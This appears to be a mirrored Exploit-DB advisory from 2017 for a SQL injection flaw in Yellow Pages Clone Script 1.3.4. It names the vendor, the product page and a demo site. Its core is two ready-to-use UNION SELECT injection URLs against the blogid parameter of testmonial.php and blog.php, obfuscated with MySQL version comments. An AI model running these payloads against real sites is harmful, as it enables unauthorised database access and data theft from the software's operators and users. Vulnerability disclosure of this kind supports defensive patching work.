Yellow Pages Clone Script 1.3.4 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-03-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41520/
  • # # # # # 
    # Exploit Title: Yellow Pages Clone Script v1.3.4 - SQL Injection
    # Google Dork: N/A
    # Date: 06.03.2017
    # Vendor Homepage: http://www.phpscriptsmall.com/
    # Software : http://www.phpscriptsmall.com/product/yellow-pages-clone-script/
    # Demo: http://dexteritysolution.com/demo/directory/
    # Version: 1.3.4
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/testmonial.php?blogid=[SQL]
    # -2'+/*!50000union*/+select+1,@@version,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6-- -
    # http://localhost/[PATH]/blog.php?blogid=[SQL]
    # -2'+/*!50000union*/+select+1,@@version,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12-- -
    # Etc...
    # # # # #